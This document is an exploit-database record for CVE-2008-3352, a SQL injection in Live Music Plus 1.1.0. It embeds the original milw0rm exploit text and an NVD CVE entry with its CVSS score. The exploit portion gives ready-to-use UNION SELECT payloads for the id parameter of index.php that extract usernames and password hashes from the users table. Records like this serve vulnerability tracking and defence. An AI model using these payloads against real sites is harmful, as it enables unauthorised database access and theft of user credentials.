Live Music Plus 1.1.0 id Remote SQL Injection Vulnerability

{"bulletinFamily": "exploit", "id": "EDB-ID:6128", "cvelist": ["CVE-2008-3352"], "modified": "2008-07-24T00:00:00", "lastseen": "2016-02-01T00:16:12", "edition": 1, "sourceData": "###############################################################\n#################### i love abeer ####################\n##\n## Remote SQL injection Vulnerability\n##\n## Live Music Plus v1.1.0\n## \n###############################################################\n###############################################################\n##\n## AuTh0r : IRAQI\n\n##\n##\n##\n## Email : expl0it.zone@googlemail.com\n##\n##\n########################\n########################\n##\n## -[[: Exploite :]]-\n##\n## http://www.xxx.com/index.php?act=Singer&id=-1%20union%20select%200,concat(password,0x3a,username),2,3,4,5+from+users/*\n##\n## index.php?act=Singer&id=-1 UNION SELECT 1,password,3,4,5,6 FROM a5421577_db2.users--\n##\n########################\n########################\n \n1) Download script : http://www.nersoft.com/\n2) Passwords Md5\n \n#############################################################################\n\n# milw0rm.com [2008-07-24]\n", "published": "2008-07-24T00:00:00", "href": "https://www.exploit-db.com/exploits/6128/", "osvdbidlist": ["47139"], "reporter": "IRAQI", "hash": "b91b35816ce76acc5e32896f77f850b5eb506a9937ae564f684dc58c096ed659", "title": "Live Music Plus 1.1.0 id Remote SQL Injection Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Live Music Plus 1.1.0 (id) Remote SQL Injection Vulnerability. CVE-2008-3352. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/6128/", "enchantments": {"vulnersScore": 3.6}}

{"result": {"cve": [{"id": "CVE-2008-3352", "type": "cve", "title": "CVE-2008-3352", "description": "SQL injection vulnerability in index.php in Live Music Plus 1.1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter in a Singer action.", "published": "2008-07-28T13:41:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3352", "cvelist": ["CVE-2008-3352"], "lastseen": "2017-09-29T14:26:00"}]}}